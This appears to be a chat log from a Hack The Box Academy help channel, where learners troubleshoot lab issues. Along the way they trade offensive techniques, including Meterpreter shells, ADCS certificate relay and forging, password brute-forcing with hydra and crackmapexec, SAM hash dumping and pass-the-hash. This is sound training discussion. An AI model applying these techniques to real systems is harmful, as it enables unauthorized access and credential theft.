#modules
In the AD module, I can't RDP into the Windows host in "LLMNR/NBT-NS Poisoning - from Windows". Tried it with my own system and the Attack-Box. xfreerdp stays with a black screen and rdesktop says that the credentials provided are incorrect. Is this still related to the pinned message about spawning/connection issues?
hit enter
what's going on, everyone suffering from this black screen lol
it's just normal windows things
yeah, also the labs are slow these days
XD i feel stupid now
but this is what osint could be about
dw it happens for a lot of ppl
Osint is boring imo
I know, but recently it feels like half the time it's more about troubleshooting technical issues with HTB than the challenges in the boxes themselves
Hey guys, has anyone here had issues with ffuf being really slow from a local Kali VM? Only getting 28 requests per second even using 200 threads
the black screen is not an HTB issue lol
This is against the target in the ffuf module
That is true, that's on me, but the thing is when something is not working as I thought it would, I tend to think it's an issue with the platform.
I am on a reverse Meterpreter Windows shell that was executed from a web ASP shell so I can get a more stable shell. With my Meterpreter reverse shell I pivoted into a box with proxychains and got in with RDP, and I'm trying to import PowerView on that pivoted RDP host, but it seems not to work at all
Anyone having connectivity issues with the AD machines?
The ip spawns, but the rdp session never opens
Yup same here, use the attack-box, that worked for me
what does "doesn't work at all" mean? what are the errors and what commands did you use
all PowerView commands give "command is not recognized"
Yesterday AD labs worked after about three respawns, now just getting this
how did you import it? and did you open a system shell to do it?
i opened a powershell in rdp and did Import-Module .\PowerView.ps1
when i do Get-Module it shows PowerView is imported
what's the powerview command that you used
Is there a particular VPN we should be using to gain access to the AD machines? I have tried respawning 5 times already. Can't RDP into the lab
can you ping the machine?
pinging is fine, it's just the rdp access
I just checked.
Something is wrong with the windows machines
make sure you use the right creds
and single quotes for password
yeah i was about to say that
something simple like ! can ruin the password and it would be received without the !
so like
Password!23
Would be received like
Password
so either escape special characters or use quotes around it
They were working yesterday, just took a while to connect. I'll read ahead and come back tomorrow.
Try the TCP VPN
weird I've never seen this happen, run
Get-Command -CommandType Function | Where-Object Source -eq ''
if you don't see any powerview commands, then it probably didn't import correctly or your powerview copy is broken
General question about XSS, why did we need “> at the start of our payloads for the XSS module?
read the page source
Closing the html tag thats before
Cheers
anybody else having a problem with Academy not completing a module when you finished it?
make sure each section has a tick on it in the table of contents
It has
no it doesn't, there's one tick missing
all good
anyone
try with valid creds
those are the valid creds
Hey guys, in the skills assessment for the CDSA thing is there a way of knowing why your answers are wrong or right?
may i dm you
I'm having trouble installing Linux on my VirtualBox because of UEFI settings, can someone please help
I was logging on to SMTP and then, out of curiosity, I tried POP3 and it worked 🙂
Nope. Show here the steps you've taken, the module and section name. Why you think your question is right. And wait for someone to answer
Otherwise people would just get the answer and move on.
Trust me. It's better this way. If there are issues in the module. Add to #errarum
No the thing is it’s a multiple choice quiz for the skills assessment so I got the answer anyways and I Agree with u by the way
But still some help on why it's wrong is good
Hey ppl
if I can't access my BIOS/UEFI settings, am I doomed and can't use any virtual machine because I can't enable the hypervisor partition?
If you mean... You can't enable virtualization in your host... Then yeah that'd be a problem
Why wouldn't you be able to access your uefi
because i tried youtube guides, chat gpt help and what not to get there
something is bugged or something
it doesnt go there
you say it's not working but didn't give any details, what have you tried, what errors? also this isn't a tech support channel
I'm trying to install CentOS 9 on VirtualBox. I considered giving up and trying another VM, but actually others won't work as well, correct?
thanks for asking. I tried F12 and Del, I tried commands to redirect me there after boot, I tried a command to go directly there after boot, I tried the restart option from "recovery" and I got there. The closest "try" was after I click the UEFI firmware settings, it says "restart to change UEFI firmware settings", I click restart, and nothing happens, just a normal restart straight to desktop
this is the error i get : Not in a hypervisor partition (HVP=0) (VERR_NEM_NOT_AVAILABLE).
AMD-V is disabled in the BIOS (or by the host OS) (VERR_SVM_DISABLED).
Result Code:
E_FAIL (0X80004005)
Component:
ConsoleWrap
Interface:
IConsole {6ac83d89-6ee7-4e33-8ae6-b257b2e81be8}
this isn't a tech support channel, post it at #1024429874246590575 with as much information as you have, especially the steps you tried to get into BIOS, there should be no reason you couldn't access it
thanks i will try. but do you think it fixable?
there's nothing to be fixed, you just have to enable an option in bios
can i dm you?
post it in #1024429874246590575
thanks i did it
Hi, can I ask somebody for help relating "DNS" section of Footprinting module in HTB Academy, please?
Just ask it here dude, it's also likely your question has already been answered here too
Discord search be wild
it will be the same question as couple days before ... working on DNS in Footprinting module - the 4th question is relating to finding FQDN of a host where the last octet ends with .203. I discovered two zones and used all of the wordlists available in Pwnbox. No host was found. Can somebody give me a hint what wordlist contains that host, please?
try to find all subdomains using AXFR , then try to find all the subdomains of subdomains using one of the tools from the section
well, the dnsenum discovers less than gobuster ... the AXFR can be done with one domain only. the enumeration of the domain which has the zone transfer enabled is reporting "Refused" on all requests (bruteforcing of the hostname does not work).
some AXFR is allowed for some hosts and not for others
- there's better tools for this situation than the ones you are using
the AXFR is enabled for one zone named in****al. There is no AXFR enabled for other zones/hosts. Hostnames of one zone can be bruteforced.
Honestly I felt down to analysis by using dig/host/nslookup and wireshark.
well if you find this , then you found a lot of subdomains , try to brute force them using other tools
this = the "in**al" zone or the second one?
bruteforce the subdomains you found
I've already done that - the in**al domain does not contain anything useful (all responses from DNS are "Refused"). The second one contains some hosts, but none of those hosts ends with .203.
can you share the wordlist you used?
don't bruteforce the in**al, bruteforce sub.in**al
ok, thanks, I will try ...
Dnsenum works just fine for me with a fierce wordlist on the right subdomain
I believe i said last time: there's more than one subdomain to try
A zone transfer will be better on the initial domain, and you've already ruled out the 'internal' subdomain
If you run dnsenum against the right subdomain it'll only take a few minutes for it to find your answer
So far no joy ...
axfr against "inla*.htb" was done --> I've got the internal subdomain.
Then I tried axfr to internal - I have the list of hosts/zones.
I tried to BF (with the wordlist provided by you) the hosts against sub sub domain ... all responses on my requests are "Refused".
There's more subdomains on inlanefreight.htb
yes, but those domains do not respond to axfr request.
You don't need to bruteforce internal, it's already freely giving its info to you
That's where dnsenum comes in
It bruteforces them for you
anyone know how to solve this ?
ps : Idk why , but i will not use ligolo for this one
When you compile chisel you need to do it statically
I just ran go build ....
or just grab the binary from github, should work for most gcc versions
finally, got it. But by using gobuster.
¯\_(ツ)_/¯
many thanks to @fathom pendant and @limber river. I'm going to discover where was the issue
Didn't know gobuster could bruteforce like that
But the intended way is with dnsenum
well that's seems fair
Hey guys, can someone explain how Split-Tunnel VPN work?
i am currently reading the module, but i didn't quite catch the meaning
It means the vpn only accesses resources on its subnet
It splits the network connection.
The openvpn for HTB is a split-tunnel, you can still use your network connection - while also accessing the internal resources
oh i think i understand it now, accessing the VPN's network and accessing the WAN are 2 separate things in this case
using a vpn to change your location would be just 1 thing, since you access everything through the same network
right?
However, for a company, split-tunnel VPNs are typically not ideal because if the machine is infected with malware, network-based detection methods will most likely not work as that traffic goes out to the Internet. I didn't understand this part either
So using a service to change your location is different
The tunnel goes through the internet to connect to the endpoint.
eeee
it's still happening? damn
bruh still loading whats wrong with htb
I hope it's ok to offer it here, I'm just really desperate. I can't install a VM because I have a problem not letting me open the BIOS/UEFI settings. I'll pay 100 dollars via PayPal to whoever sorts this problem
use wsl i guess
what is wsl
windows subsystem for linux
can you help me sort the problem?
I tried everything YouTube, Google and ChatGPT have to offer, nothing worked
not without knowing what it is
contact whoever built your pc
or watch a video and see how the guy is pressing the button, getting into BIOS is fairly simple
it's simple when there are no problems
there is a problem that makes it impossible for me, I need help
I tried several ways of getting there many times, so easy it's not
what problems? your computer literally wouldn't work if there's no BIOS. like I said, contact whoever built your PC
dont even remember who it was, some agent from some company
Then contact the company
Surely they have some way to contact their customer support
I'll order a technician or something
Either way your technical issues don't belong in this channel
we've provided all the help we could, only the people who built it can help you now
they weren't answered anywhere else, I thought offering money here and maybe someone would know how to fix it
is anyone else facing problem on spawning ?
It doesn't matter, this channel isn't for that
🎉 🎉 🎉 finally
Yeah, A lot of people are I think marci can link u to the chat or smth.
You would have to scroll up a lot though.
eu1 works, just spawned a lab with 5 machines
i can change the location?
yep, above the pwnbox window you can select the vpn servers
Hello why I don't have a preview? plz
Try escaping the arrows
\< and \>
This?
Also if you take out the grep pipe do you get something?
Then what you're looking for isn't in the grep
yea i thought i was blind or something
In module Windows Privilege escalation and section Pillaging. Last question is: Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer.
I restored backup and then moved sam files to my machine and used secretsdump to extract hashes. But that answer section in question is always saying wrong answer. I tried to submit nthash, lmhash, and the whole thing but everytime wrong answer. Did I miss something?
did you try to log in with the hash?
I am following the course and I don't understand it asks you to do the same thing for the exercise as what is in the exercise
So I follow the course and also try the bash code doesn't work either
¯\_(ツ)_/¯
it is the one on the rightside, are you sure you tried with that?
Got certificate error when trying to pth with xfreerdp and error with evil-winrm too
Guess the hash is wrong one then
[11:13:07:279] [248656:248657] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[11:13:07:279] [248656:248657] [WARN][com.freerdp.crypto] - CN = PILLAGING-WIN01
[11:13:07:493] [248656:248657] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[11:13:07:493] [248656:248657] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[11:13:07:493] [248656:248657] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[11:13:07:493] [248656:248657] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
This is the whole failure, there seems to be a logon failure too
Yeah, I'm sure that I'm using that hash, but I don't think the hash is right because the answer section is not accepting it
dm me the hash
Hi all, im currently doing the nmap module in academy and my scans are veeery slow. I'm located in the EU and also use the EU vpn. Whenever I'm on the main HTB platform and scan boxes it's quick. It's only on academy it's this slow.
show your nmap command
sudo nmap -p- -Pn -g 53 10.129.20.50
Yeah true, I'll try that and see if it helps. Thanks!
okay but it doesn't help me ^^"
i'm just saying the thing you're grepping for isn't in the output, so maybe they meant to do ?id=2?
if that's what the document id from the previous part was
I have my scripts, I just test the basic command it is not okay how to try my commands to know it is okay ^^"
it is okay for this
try restarting the lab then? ¯\_(ツ)_/¯
restart the lab then?
again?
🥲
haven't done this module so idk ¯\_(ツ)_/¯
wich section/module ?
WEB ATTACKS
Mass IDOR Enumeration
lemme check my notes
why are you grepping this?
Who knows game programming?
I find!
Anyone else been having problems with RDP connections? My connection has been very slow after the weekend's issues and sometimes I get reconnects. I use Remmina and I didn't have any problems last week when I was doing the Active Directory module. All sessions were pretty smooth. Now it's a pain to use RDP
just ask your question my dude if it's related to an academy module
tcp vpn?
@fathom pendant I use UDP one
use tcp
Okay, lets try that
In private
using uid ?
if you can't ask publicly, then no
read #welcome on how to access more of the server, there's a #programming channel you'll be able to access
hello all, I can't for the life of me spawn any targets. Cleared cache and cookies, logged out and in, nothing. Anyone else facing similar issues?
Hey guys can I join somebody’s team for capture the flag?
Any good resources for privilege escalation? I spent like 4 hours last night in the last portion of the Linux fundamentals knowledge check. I got the first flag but couldn’t get the flag for the root user
everything you were taught in the module should be enough to privesc
there's nothing that's too complex to do
you have user: see what you can do with user
iirc this is a sudo -l and a specific binary that you can check gtfobins for
I couldn't ssh in as user? Or are you talking about Metasploit?
if you have the first flag you have a user
Maybe I’m a slow one can you help me which server is the right one. My first guess was Academy but like you said I’m wrong. But still can not find any server called: CTF Teams, Joining, and working together or something like that…
I got the first flag through Metasploit..
there is no exact room for ctf teams, this channel is for htb academy modules
Sudo isn't a command option when I'm in the server through Metasploit
i don't recall using metasploit for this
you have to drop into the shell
So then I should quit this channel?🤣 Bro I’m a newbie I have no idea yet with hackthebox
I’m sry for bothering man
read #welcome there's instructions there that'll help you access more of the server my dude
I’ll show you what I did later. I just got to work. I’ll be back at home later tonite
Oh…. Ya know what. I think I know who I can ssh into the server as. The user profile I found the flag in while I was using Metasploit
i just mean if you're using msfconsole, and you have a reverse tcp connection: using shell you drop into the interactive shell of the machine
I used msfconsole to find an exploit and used the exploit
I changed the ip and LHOST and did the exploit command and got in
Yes.
That’s how I got the first flag
If you type in shell, it'll drop you into the system
From there you can do everything else
Can I use a shell command in the Metasploit console?
Not really
hi! I got a bit stuck at the command injection assessment 😄 I don't think I've found the place where I can inject the commands and have it accept them. Can someone point me in a direction?
It's a lot simpler/easier to just drop in and do from there
I found the flag in a profile called mrb3n or something in Metasploit, would I use that profile to ssh into the server?
What I'm saying is there's literally a command called shell
I know
You don't use .profile to ssh
I know that but you need a password for any user
1 sec
Always see what your user can do
What I was thinking is ssh mrb3n@<server_IP> that’s the user dir I found the first flag in
Or would it just be user@<server_ip>
Oh wait
I’m dumb as fuck
Sorry Marcie I was mixing shell and ssh
I thought shell was the command language ?
… yes I did use msfconsole to drop in. That’s how I got the first flag
Is something getting lost in communication ? I feel like I’m missing something
Is there anybody named One-Nine9 here? I received a notification from this guy saying that my account appears in a publicly disclosed data breach
run shell in msfconsole
meterpreter and the system shell are two different things, you can get a system shell in meterpreter by running shell
After I connect to the exploit or before ?
I’m confused what step i should do this in
meterpreter:
meterpreter> shell
don't leave me hanging fellas 😄
Hi All,
Regarding ADCS ESC11, the first question is to compromise WS01, but when WS01 is the CA, is it possible to relay it to some of the templates? (because I tried all of them with no success, and when relaying the DC I get the cert)
Thanks
So before I exploit into the server
what do you mean by this? you want to relay ws01 to ws01?
look at where you should be typing the command at
That's after you run the exploit
Thank you Marcie
So once I’m in the server where I found the flag
How can you drop into a session if you don't have the exploit running
Actually yes, that's what I am trying. I got the flag, but by getting the DC certificate and then DCSync. The question said to abuse ESC11 and compromise WS01, and I understand that WS01 needs to be triggered to authenticate to itself, but no success and not sure if it's even possible
self relay is not possible, yes
Isnt running the exploit already dropping into the session?
meterpreter session and the system shell are two different things
Hm ok I’ll swing back once I’m home I think it’ll make more sense to me if I have it in front of me
Great, Thanks for confirmation.
@next bronze Just one more question regarding Certificate Mapping.
I played with it for some time, but the thing I cannot figure out is when this happens: when the certificate is used to authenticate to the DC, for example getting a TGT, or also when we enroll to receive a certificate?
Because when I perform the Golden Cert attack and generate a certificate with ForgeCert, for example, the SID is not present and I get an error (when mapping is set to 2), but when I request a new certificate with the already forged one and add the SID, the certificate authenticates and gets a TGT successfully. From this I am thinking that mapping is only checked at the DC when the certificate is used to authenticate, but not 100% sure
not sure about that one, don't remember having to specify the sid when I did it, you can use -debug to get more info
INFORMATION GATHERING - WEB EDITION
trying to get the curl from app.inlanefreight.local but im getting error: [★]$ curl -I "http://${TARGET}"
curl: (6) Could not resolve host: app.inlanefreight.local
can anyone help me please?
Hmmmmm….
Actually this is the problem that I cannot see, but from probing and testing I assume that forging a cert for a template even without the SID is going to be forged and received, but when you try to auth to the DC you will receive an error "SID not match" or something similar. And in this case with the golden cert it worked to forge a new fixed one with the old one that is not accepted by the DC
Will try also to look into the logs
Thanks again for the help really appreciated
Is app.inlanefreight.local in your /etc/hosts
is there even an option to specify the sid with certipy forge? do you mean -subject which is the DN?
@next bronze A, no not that param (-subject) its called /sidextension:.
not sure if there is documentation you can find it in the github source code
oh you're using certify?
its available for both the C# one and Python one
-extensionsid for the certipy and /sidextension for the certify
should just be -sid for ceritpy
https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d
From an updated [MS-WCCE]: Windows Client Certificate Enrollment Protocol section 2.2.2.7.7.4, “The CA MUST consider this extension [szOID_NTDS_CA_SECURITY_EXT] from request attributes only when the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is set on the corresponding certificate template object.” That is, when requesting an “enrollee supplied subject” certificate the szOID_NTDS_CA_SECURITY_EXT is not set in the certificate by the CA by default. Rather, the requesting user is allowed to supply the szOID_NTDS_CA_SECURITY_EXT extension in the request.
In fact, once May 9, 2023 hits, all requesters will have to supply the szOID_NTDS_CA_SECURITY_EXT extension value as without that value (or a strong mapping) present in the resulting certificate, authentication against the DC will not work.
We have recently updated this in Certify with the /sidextension:<S-1-…> flag to support this. It uses code from Carl Sörqvist to build the extension properly and include it with a certificate request for a template with the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag set.
mhmm did not test -sid I am using this one extension from certipy
But this could be due to different version of the certipy will check the new one
might be, I have the latest version and there's no -extensionsid option
Nothing like that was mentioned in the module though….
I’ll message you when I’m back home
Once you're in the reverse shell, you have a user. From there it's just leveraging what that user can do
Yea just checked the latest and maybe is changed or it was from another repo
Somebody please help 😵💫😵💫 I’m on windows priv esc first assessment I can’t find the file with the ldap admin credentials
@next bronze Just out of curiosity ESC11/8 could be done also with machine acc credentials ( I mean to invoke/trigger Coercer for example ) ? ( Because never tested it )
i forgot to add it on, tks
like Coercer coerce -u 'machineacc$'? yeah any domain creds will work
So I’m confused is shell a command in it self?
Like shell…… etc etc etc
Cause the hint for the root flag is LinPEAS and another thing for privilege escalation ?
So in msfconsole, after you run the exploit, typing shell will drop you in
LinPEAS is an enum tool
Then the hint is wrong or something…. Hmm
Msfconsole has an upload/download command
The hint is to use linpeas to find the weak point
It's pointing you in the direction
Need assistance with Password Attack Lab - Hard. I can't seem to bruteforce Johanna's password. I used cme with the mutated wordlist, given password list, and rockyou but either it doesn't find the password or takes hours to go through each listed word.
Any tips?
Oh so the next step after linpeas would be to use shell if I’m assuming what you are telling me.
The next step is to use linpeas in the shell
That makes some things easier to gain access.
Just encountered a case when I relayed a normal machine (low priv) to the DC's template and got only the private key of the low priv machine. I saw that this is part of THEFT4 and was wondering how this private key can be used to enroll for a certificate?
I think this needs to be done manually, like creating and signing the CSR, but I did not find any option in certipy/certify for that?
I see now
Maybe found several ways need to test them with openssl and ps commands
Nvm guys I found it
This isn't related to a module per se, but every time I use SharpHound to generate BloodHound data, I am unable to import the computers.json file. This is on both pwnbox and my own machine. Everything works fine with bloodhound-python. Has anyone else experienced this?
I've tried updating BloodHound and getting latest Sharphound release
the latest sharphound is only compatible with bloodhoundCE
Nice. Thanks
There's still a free version
sorry bother you @languid fjord or any other moderator, but the Spawn machines issue is still present?
afaik, things are working okay as of now
ok., thanks, lemme check if I'm the issue LoL
The issues seem to be intermittent at best atm
was able to spawn targets on eu-1 just fine here
Hey all, I am having a hard time with the Javascript Deobfuscation Module: Deobfuscation question. I have gone through everything and I fully understand the concepts; however when I use the tools I am getting errors in the results and the question will not accept the flag. I know that JSNice no longer works with the module, but I'm stumped as to where to go from here. Any help would be awesome!
I used programiz and the print() method
Any tips?
Could I get a little bit of explanation on the print() method please?
I'm in the US zone, any recommendation cus the spawn machine is not spawning....
which module?
Windows PrivEsc
hello guys, im having some trouble in the linux module
with this question : Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
i can't get the answer right, i need some help
Just print the last bit instead of executing it
Do I need to unpack the code before plugging it into programiz?
Nope
The print method is used to unpack it
It's explained in the module about using print
I'll read back through and try again. Thank you for the help!
Seems to work h ere on us-1
ok., lemme switch to us-1, thanks
I just found it! I think my eyes glazed over it the first time lol, now I feel foolish. Thanks again!
Yeah it does, I'm just having trouble knowing where to plug in the console.log bit, do I replace 'return' with it?
even doing that I'm getting it to return anything?
I just input a print statement instead of the execute ¯\_(ツ)_/¯
I think I replaced eval with print
That seems to have done the trick, I was being to literal with replacing return lol
It also looks like there's other sites that's mentioned
So they must've updated it since I last glossed it over
That last suggestion got success, just had to figure out how it wanted the flag formatted. Thank you!!!
Ye
Also for the skill assessment, read the questions carefully
It's easy to get ahead of yourself in it
Will do! Thank you for the advice!
That really goes for any of the module questions, sometimes you can overthink the questions
Hey, I am trying to solve the mssql service in the footprinting module, The first question asked to list the hostname of the Mssql server , i ran nmap for it sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248 but getting this as output
Hey everyone, I'm still struggling to connect to the host in Kerberos Attacks, Kerberoasting from Linux. The ssh connection times out. Earlier this week (or the end of last week?) there was an issue with the EU servers so I attributed it to that, but that was resolved, no? Can anyone check it out please?
You can just do ms-sql* btw for the script thing
But you can also just use other methods of getting the server hostname
Also don't set any script args, maybe that'll net more results
you'd need to add the debug flag to know more ¯\_(ツ)_/¯
NSE: ms-sql-dac against 10.129.133.95:1433 threw an error! /usr/bin/../share/nmap/nselib/mssql.lua:3334: bad argument #1 to 'ipairs' (table expected, got nil) stack traceback: [C]: in function 'ipairs' /usr/bin/../share/nmap/nselib/mssql.lua:3334: in function </usr/bin/../share/nmap/nselib/mssql.lua:3327> (...tail calls...)
Getting this error, when i used the -d flag
Ah nmap version issue
This included the issue though still dont know how I can fix it
Maybe you can downgrade your nmap to an earlier version and it'd work
will try
But you can also just try doing -A to see if that gives you a device hostname
How can i downgrade??
Hello. Anybody found any issue with flags in academy? On Nmap module (NSE scripting), looks the HTB{} flag found is not recognised as correct....
Extra spaces
looks there is any extra space before/after HTB{flag} string :/
thanks but i am unable to find a version list
for parrot
I even tried to rewrite manually the whole string (checking each character and no spaces). Still not correct...
it just says this E: Version '7.91+dfsg1' for 'nmap' was not found
ok i feel stuck
i will just use my vm
Also if you are still using script args, you should specify a blank password with ""
i removed the args but im getting other errors when i try to downgrade
¯\_(ツ)_/¯
well i am trying on my local vm, hope it works
"Examine the target" this means break in right?
It means look at it via whatever means you can
Read #welcome , this isn't a gen chat
I tried the lab just now and it worked. I'm using a Parrot VM, and used 'eu-academy-1' VPN connection.
I did have to wait over 20 minutes to be able to RDP to the bob user from within the Kali target
it seems such a casual way of putting it :p
guess im up to the point where breaking in is a given.
up until now its either given credentials and then had to find more info with them, or the question has been to find those credentials
this one the first question just assumes that i already have access to the target without giving that access
Or it's telling you to look at the available ports/info and determine the best way to attack it
The module should have prepared you enough to that point for you to make the right step forward
oK I had to update my nmap version from 7.93 to 7.94 and it worked
this module on its own didnt (thats what i mean, the whole text of the module is what to look for once you are already on a target) but hopefully i have learnt enough in general 🤞
Which module and section?
Bc I can guarantee you they gave you info on how to look for stuff
well i guess actually the module technically did, its the section that didnt say anything
Password Attacks -> Linux Credential Hunting
i dont need help (at least not yet) i was just a bit surprised at how it suddenly jumped to just assuming i could access a target
Because you can
You just need to use a set of credentials you grabbed earlier
ah interesting, i do have most of them i was just working out which service would be easiest to attack
All the linux targets are linked in this module, same with the windows
This is why I believe I advised on saving all credentials you find when you first started this module
This is why
ye tbh i was already saving most of the info i found anyway
i have like this for every module / section
Hey still working on Password Attack Lab - Hard and been working the brute force all day with no results. I've tried on|| WinRm, SMB, and RDP using CME and Hydra for user Johanna using the mutated list, password.list, and rockyou||. Can anyone provide any guidance on what I may be doing wrong?
No
Just reread your thing. But yeah shouldn't be much, rdp should be an easy thing
Why does this course give you questions that you arent taught to answer in the module???
I mean wtf this is a scam operation lmao
I'm just not sure what else to try. I've tried ||crackmapexec rdp -u johanna -p mut_password.list 10.129.X.X and hydra -u johanna -P mut_password.list rdp://10.129.X.X.|| I've even switched wordlists and they just go on for hours.
Nah the modules definitely give you the resources to answer questions dude
Not in linux basics
The forum literally proves that too, this is literally a setup lmao
Linux basics is kinda shit but it's not impossible
" What is the path to the htb-student's mail?"
You can't get that without using cat or grep
I mean the env command exists
crackmapexec works just fine, I'm guessing you're just missing the --local-auth flag
^
I've tried that as well
One of the sections literally gives a list of commands that you'll likely use
man env literally says 'run a program in a modified environment'
it's the solution in my notes
If you just do env It lists all environment variables
is it literally after this page 💀

You dont put the instructions on the second page and the exam on the first thats just brainlet logic
A lot of this module I'll concede is out of order
crackmapexec for smb and the mutated list with that flag
I'll give it another go.
Well then they should get off their lazy asses and fix it
But it's not a scam lol, most of the modules are better than that one though
Suggest the fix in #858470491676737536 dude
have a look at the "Cheat Sheet", that lists a bunch of commands that might come in useful
or more generally, info that might be useful for the particular module
Besides, the tier 0 modules refund their cost when you complete it
also a shorter list of commands is at the very top of the first section with questions
So it's not like you actually pay anything for them
Just very frustrating because I don't like to cheat in any sense
and I don't like wasting an hour to realize the information isn't even given to us prior to the exam
the cheat sheets aren't cheating
god forbid you do research and use google 
The cheat sheets are just a compilation of the commands in the module, generally without context
I'm not afraid of doing research, but I feel that it's a waste if you're not trying to figure things out. I take the same approach with programming: I don't like to go and find the answer without thinking about the problem and using the bare tools given to me to figure it out. How else will I improve? I didn't realize that things may be out of order. I expect more out of a site that has subscription plans as high as $68 a month; you'd think they'd polish what they charge for.
Guess I have to refer to this sheet
the command you needed is listed at the start of the section
well, they're not charging anything for that module, the pentester path is the best course on the market, can't say about the others but feedback on them has also been overwhelmingly positive
The tier 0 modules are free, you get refunded upon completion of it
in any case this is a field where research and google are your best friend
Fair enough
And yeah I started this course because a company was willing to help me get situated with pen-testing as long as I complete this course entirely. So I'm trying to hold myself to be very knowledgeable so I can have competency in the minimum expectations they have for me once they take me in
they want you to complete the pentester path?
then stick it out, you'll be pleasantly surprised when you get into it
I hope so I'm only familiar with software engineering and nothing else, I'm going blindly into this. I can't even figure out how to use grep the terminal stops responding when I try using it 💀
depending on what command you're using, you might be searching the entire file system, it stops responding cause it's doing its job but it takes a long time
If you're new to Linux and stuff on a whole: I hope they're not holding you to the 43 day timeline
btw studying after taking an exam has been proven to be one of the most effective strategies for learning the information
Can confirm, any test I can do multiple times and learn from is better for me to learn from than reading sometimes
are those articles on topic for this channel ? 🤔
He told me I should be able to get it done in a month
that's not gonna happen 💀
I worked with Linux a very very long time ago and remember practically nothing
Yeah no it isn't 💀
If you're new to pentesting and tools, you'd have to spend 16 hours a day to meet that deadline
Most of the people that are new on average spent 3 months on it
I know very experienced people that haven't burned through the course in a single month
unironically this is literally wake up and study and dont stop till bed time territory
I'm giving myself a minimum of 15 hours a week to be working on this, I also have to allocate time to work on making sure I don't fall back on programming skills again
having the programming skills is good for some bits of it i think
and I have a part time job starting up soon so that'll make this interesting
noted lol
Thats what he said but I think I have to pick up other languages, most of my experience was with Java then C++.
One of the longest modules is password attacks, just due to how long the attacks take
learning both at the same time can be difficult for beginners
I'm assuming brute force is the one that takes the longest? 😂
Yep
at least you have prior dev exp, thatll make the programming learning quicker
definitely but this feels like learning from square one again
Most programming stuff is easily transferable
It took me nearly 3 years to understand object oriented programming
and 3 more years to understand OO is shit 
If you want experience with learning Linux command line stuff, I highly recommend a command line/terminal game called "bashcrawl"
Its unironically a decent way to learn some basic navigation commands
pushd and popd are super handy if you need to temporarily switch to a different directory
spend a weekend installing LFS
I'll look into it I definitely want to have the basic commands down
Well I figured out the question but I'm confused with how I was supposed to know I had to ||use cat /var/passwd ... how was I supposed to know its located in /var/passwd||
What's the question?
Also I've not heard of /var/passwd, I've heard of /etc/passwd
ok i give up 😦 can anyone confirm/deny if ||sam|| is the correct user to be logging in as for linux credential hunting unit (i can get in but then not access a bunch of the files that are relevant to the section text)
No
There is another
[k]
ok thanks
:( this is flying over my head, none of these questions relate to whats taught on this page besides the first two
You can use Sam though to check /home/
They probably do, and it's definitely going over your head
There's no shame in asking for assistance
I may have been mistaken about you already having these creds
I forget if credential hunting is early or late in that module
i dont think i do have the creds (whether they were ones that i should have found earlier or not im not sure) but its ok, ill go back to original plan of attacking this as a fresh target
I am a beginner in cybersec and i have a problem in that module https://academy.hackthebox.com/module/18/section/70
Use Sam to check /home/ for usernames
what was the question tho
Well, with the question What is the path to the htb-student's mail? How am I supposed to figure out what to use? || cat is shown later, and I don't know why cat /var/passwd worked. It showed me /var/mail in the list and I assumed mail would have a folder for /htb-student so I entered /var/mail/htb-student and it was correct||
I gave the answer /var/mail for the question "What is the path to the htb-student's mail?"
env
Because that's not the full path
oh
looks like we now have 2 people on the same section :p
thx
What is the first directory ?
That’s a hint
Just use ||env|| lol I didn't realize it does that
I try that and i come back if i lose
I said it a few times earlier

🤦♂️
||env ||command is useful for finding info/settings for the current user
And even explained that if you use the command on its own, it lists all environment variables
yup
In the format
VARIABLE=VALUE
and even if you didnt know what you needed was an env variable, you should go through each of the unfamiliar new commands it introduced to see what they do 🙂
tbh the man page for ||env|| mainly talks about stuff that isnt showing the list of current environment variables
or even just run things go brr. whats the worst that can happen? I obliterate my system on accident and have to revert my VM? Oh no! anyways
I don't have the permission to use env
I did ||man env|| and couldn't understand the description
env is a core utility, im not sure how youd even block it without breaking things
and thx for the answer of the question but what's the reason that answer is correct?
the env command does allow you to run a command with custom variables
imo its def one that makes more sense if you just run it
It's like alias
You can set something with alias. But if you run it on its own, you get a list of all aliased commands
ye tbh i have screwed up linux installs bad enough to break those things in the past but it takes some doing
Yeah it happens
This is why snapshots are important for vms
And backups for live systems
Because that's what the MAIL environment variable is set to
for the question "Which shell is specified for the htb-student user?", how can I do it?
env also works here too :)
take another look at the output from env
Look for the variable that would likely be it
You can also echo variables;
echo $VAR will print the value of that variable
ok but the file doesn't exist
Doesn't matter if it doesn't exist
That's what it's set to
ok thx
If you're looking for "something" in the env output, it might be easier to sort it: env | sort or search it: env | grep -i something
To get Kernel version all you do is || uname -r || right?
What is the ||-123-generic referring to?||
4.15.0
Release version
env doesn't work
Thanks :)
Should be good now, hopefully I can manage the rest on my own
Env should work, you're SSH'd into the target as htb-student@ip yea?
yes
Then env should work
verify your account with #welcome and then you can send images. Share screenshot of env not working
Yeah writing commands incorrectly tends to be a problem
I was troubleshooting a tier 3 module section yesterday for like a half hour because I accidentally wrote TEAMSRV in my cmds instead of TERMSRV
it happens lul
It happens
I am trying to connect to the target I spawned in Linux Fundamentals, it says port 22 blocked
I am very new at networking and remote accessing
please help?
are you trying to connect from the pwnbox or from your own machine?
are you connected to the vpn? (with correct config for the region the target is in)
i would recommend using a VM but that shouldnt affect the ability to connect
No, I am kinda lost on how to set up the VPN
